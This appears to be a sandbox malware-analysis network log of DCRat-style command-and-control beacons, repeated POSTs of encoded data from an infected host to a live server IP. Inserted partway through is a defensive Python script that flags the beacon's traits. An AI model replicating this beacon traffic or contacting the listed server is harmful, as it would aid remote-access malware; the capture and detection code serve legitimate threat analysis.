Jan 8, 2025 18:09:19.296367884 CET | 2192 | OUT | Data Raw: 5c 5a 43 5f 5b 5d 52 5f 5e 5c 50 55 50 5a 5a 5f 5a 58 5b 5d 54 56 55 5f 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
Data Ascii: \ZC_[]R_^\PUPZZ_ZX[]TVU_TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:*W2028]0%<]*)3=V)/*-$):<8_'Y ..Y#,Z!+
Jan 8, 2025 18:09:19.751403093 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:19.775466919 CET | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 39 38 0d 0a 0f 12 3a 03 32 38 25 5d 20 16 31 0d 39 3e 2f 02 30 11 0b 5e 28 20 2b 10 3d 0a 38 02 3c 05 2c 5e 28 5d 31 5f 24 12 03 5d 35 2c 21 11 22 00 2c 5f 02 12 26 07 3d 32 06 54 3e 3f 30 02 3e 0e 3d 59 37 21 25 04 28 33 0b 0d 35 17 01 01 32 30 25 0f 30 0f 33 53 3f 00 34 07 38 10 32 01 22 03 21 50 0c 12 20 1b 35 01 28 12 35 16 14 07 29 38 2e 5a 31 26 2e 1f 27 39 37 13 34 33 27 57 24 23 34 56 32 38 2f 0c 27 06 2b 58 26 00 2c 52 2d 12 20 53 22 01 2d 53 0e 30 55 51 0d 0a 30 0d 0a 0d 0a
Data Ascii: 98:28%] 19>/0^( +=8<,^(]1_$]5,!",_&=2T>?0>=Y7!%(3520%03S?482"!P 5(5)8.Z1&.'9743'W$#4V28/'+X&,R- S"-S0UQ0


Session ID | Source IP | Source Port | Destination IP | Destination Port
43 | 192.168.2.4 | 50050 | 185.177.239.66 | 80

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:19.248172045 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:19.594573975 CET | 2596 | OUT | Data Raw: 5c 5a 43 5b 5b 5e 52 58 5e 5c 50 55 50 5d 5a 51 5a 58 5b 5d 54 52 55 5f 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
Data Ascii: \ZC[[^RX^\PUP]ZQZX[]TRU_TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:+!!Z$"<]060X="%-(U=?P=$.S:83?'/=.Y#,Z!7
Jan 8, 2025 18:09:19.938519001 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:20.071338892 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
44 | 192.168.2.4 | 50051 | 185.177.239.66 | 80

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:20.216026068 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:20.564621925 CET | 2596 | OUT | Data Raw: 5c 58 43 5b 5b 58 57 59 5e 5c 50 55 50 5d 5a 5a 5a 5f 5b 5d 54 56 55 59 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
Data Ascii: \XC[[XWY^\PUP]ZZZ_[]TVUYTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9*%Z$1(\0&#)_-$>4=? )>3...?;3:.Y#,Z!7
Jan 8, 2025 18:09:20.921646118 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:21.034898043 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
45 | 192.168.2.4 | 50052 | 185.177.239.66 | 80

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:21.174838066 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:21.531337023 CET | 2596 | OUT | Data Raw: 5c 5f 46 5d 5e 58 57 50 5e 5c 50 55 50 50 5a 58 5a 59 5b 5a 54 55 55 58 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
Data Ascii: \_F]^XWP^\PUPPZXZY[ZTUUXTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:=202$=9X%-?*U*2V'>6-?3';/-.Y#,Z!
Jan 8, 2025 18:09:21.864082098 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:21.998403072 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
46 | 192.168.2.4 | 50053 | 185.177.239.66 | 80

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:22.144668102 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:22.500210047 CET | 2596 | OUT | Data Raw: 59 5e 43 5c 5e 5a 52 5a 5e 5c 50 55 50 5f 5a 5a 5a 53 5b 5f 54 57 55 5b 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
Data Ascii: Y^C\^ZRZ^\PUP_ZZZS[_TWU[TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9)"=^$2$&#>_1%=T(?#).&0=%-<7%<,-.Y#,Z!?
Jan 8, 2025 18:09:22.864509106 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:23.000451088 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0
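
The sessions above repeat one exchange roughly every second: a POST to a single long .php path built from concatenated dictionary words and digits, an application/octet-stream body of fixed length sent with Expect: 100-continue to a bare-IP host on port 80, and a four-byte chunked reply (=Z@V) from nginx. The Python below is an added example for this report, not Joe Sandbox output and not DCRat code. It parses one such request/response pair, names the traits a detection could key on, measures the beacon cadence from the session start times, and checks how much of the captured request-body prefix is constant between two sessions. The request and response bytes, the two body prefixes and the timestamps are constructed from the captures above; the trait names and the thresholds (eight path segments, a reply of sixteen bytes or less) are assumptions.

```python
"""Traits of the DCRat-style HTTP beacon captured in the sessions above.

Added example for this report (not Joe Sandbox or DCRat code). Sample data
is constructed from the captured sessions; thresholds are assumptions.
"""
import re
from datetime import datetime

# Constructed from session 38: headers as captured, body omitted.
SAMPLE_REQUEST = (
    b"POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll"
    b"/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript"
    b"/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python"
    b"/Pollvm/toTrack/Test/DefaultImageGame7/Protect"
    b"/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
    b" (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53\r\n"
    b"Host: 185.177.239.66\r\n"
    b"Content-Length: 2596\r\n"
    b"Expect: 100-continue\r\n\r\n"
)
# Constructed 200 OK; the body is the captured "Data Raw" of the reply.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Type: text/html; charset=UTF-8\r\n"
    b"Transfer-Encoding: chunked\r\nConnection: keep-alive\r\n\r\n"
    b"4\r\n=Z@V\r\n0\r\n\r\n"
)
# First bytes of the request bodies of sessions 37 and 38, as captured.
BODY_PREFIX_37 = bytes.fromhex(
    "59 5f 46 5e 5e 58 52 5f 5e 5c 50 55 50 50 5a 58 5a 5d 5b 5f 54 55 55 51 54 52"
    " 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c"
    " 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c"
    " 58 52 5c 53 5a 50")
BODY_PREFIX_38 = bytes.fromhex(
    "59 5f 46 5a 5e 5d 57 5b 5e 5c 50 55 50 5a 5a 5b 5a 5e 5b 58 54 53 55 51 54 52"
    " 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c"
    " 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c"
    " 58 52 5c 53 5a 50")
# Request start times of sessions 38 to 41, nanoseconds truncated to micros.
BEACON_TIMES = ["18:09:15.399936", "18:09:16.347830",
                "18:09:17.304862", "18:09:18.273616"]


def parse_http(raw: bytes):
    """Split an HTTP/1.1 message into (start line, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def decode_chunked(body: bytes) -> bytes:
    """Decode a Transfer-Encoding: chunked body; raises on malformed framing."""
    out, pos = bytearray(), 0
    while True:
        end = body.index(b"\r\n", pos)            # ValueError if no CRLF
        size = int(body[pos:end].split(b";")[0], 16)
        pos = end + 2
        if size == 0:
            return bytes(out)
        out += body[pos:pos + size]
        if body[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("chunk not terminated by CRLF")
        pos += size + 2


def beacon_traits(request: bytes, response: bytes) -> list:
    """Names of the DCRat-like traits present in one request/response pair."""
    start, hdr, _ = parse_http(request)
    method, path, _ = start.split(" ", 2)
    _, rhdr, rbody = parse_http(response)
    reply = decode_chunked(rbody) if rhdr.get("transfer-encoding") == "chunked" else rbody
    segments = path.strip("/").split("/")
    traits = []
    if method == "POST" and path.endswith(".php") and len(segments) >= 8:
        traits.append("long-generated-php-path")
    if hdr.get("content-type") == "application/octet-stream":
        traits.append("octet-stream-body")
    if hdr.get("expect", "").lower() == "100-continue":
        traits.append("expect-100-continue")
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", hdr.get("host", "")):
        traits.append("bare-ip-host")
    if 0 < len(reply) <= 16 and rhdr.get("content-type", "").startswith("text/html"):
        traits.append("tiny-html-response")
    return traits


def beacon_cadence(times: list):
    """(mean interval, largest deviation from it) in seconds between beacons."""
    ts = [datetime.strptime(t, "%H:%M:%S.%f") for t in times]
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    mean = sum(gaps) / len(gaps)
    return mean, max(abs(g - mean) for g in gaps)


def common_suffix_len(a: bytes, b: bytes) -> int:
    """Length of the identical tail shared by two captured body prefixes."""
    n = 0
    while n < min(len(a), len(b)) and a[-1 - n] == b[-1 - n]:
        n += 1
    return n


if __name__ == "__main__":
    print(beacon_traits(SAMPLE_REQUEST, SAMPLE_RESPONSE))
    print(beacon_cadence(BEACON_TIMES))
    print(common_suffix_len(BODY_PREFIX_37, BODY_PREFIX_38))
```

Two caveats for anyone turning this into a rule. The host, port, path and User-Agent are operator-configurable, so the durable traits are the combination (octet-stream POST, 100-continue, fixed body length, near-constant sub-second cadence, tiny chunked reply) rather than any single value. The identical tail shared by the captured body prefixes is a candidate for a content match on this build, but the report does not establish the body encoding, so nothing here should be read as a decoder.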


Session ID | Source IP | Source Port | Destination IP | Destination Port
47 | 192.168.2.4 | 50054 | 185.177.239.66 | 80

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:23.133805037 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:23.823512077 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:23.954796076 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
48 | 192.168.2.4 | 50055 | 185.177.239.66 | 80

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:24.100411892 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:24.786587954 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:24.924947977 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
49 | 192.168.2.4 | 50056 | 185.177.239.66 | 80

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:24.787190914 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2164
Expect: 100-continue
Jan 8, 2025 18:09:25.451493025 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:25.752012014 CET | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Jan 8, 2025 18:09:25.752115965 CET | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port
50 | 192.168.2.4 | 50057 | 185.177.239.66 | 80

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:25.057559013 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:25.752337933 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:25.882813931 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
51 | 192.168.2.4 | 50058 | 185.177.239.66 | 80

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:26.013489008 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2592
Expect: 100-continue
Jan 8, 2025 18:09:26.683640003 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:26.810686111 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
52 | 192.168.2.4 | 50059 | 185.177.239.66 | 80

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:26.977443933 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:27.668800116 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:27.806440115 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
53 | 192.168.2.4 | 50060 | 185.177.239.66 | 80

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:27.944159985 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:29.491681099 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:29.491991043 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0
Jan 8, 2025 18:09:29.492002010 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0
Jan 8, 2025 18:09:29.492228031 CET | 225 | IN | HTTP/1.1 100 Continue
Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Wed, 08 Jan 2025 17:09:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4=Z@V0
Jan 8, 2025 18:09:29.492585897 CET | 225 | IN | HTTP/1.1 100 Continue
Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Wed, 08 Jan 2025 17:09:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
54 | 192.168.2.4 | 50061 | 185.177.239.66 | 80

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:29.614226103 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:30.285806894 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:30.418586016 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
55 | 192.168.2.4 | 50062 | 185.177.239.66 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:30.551202059 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
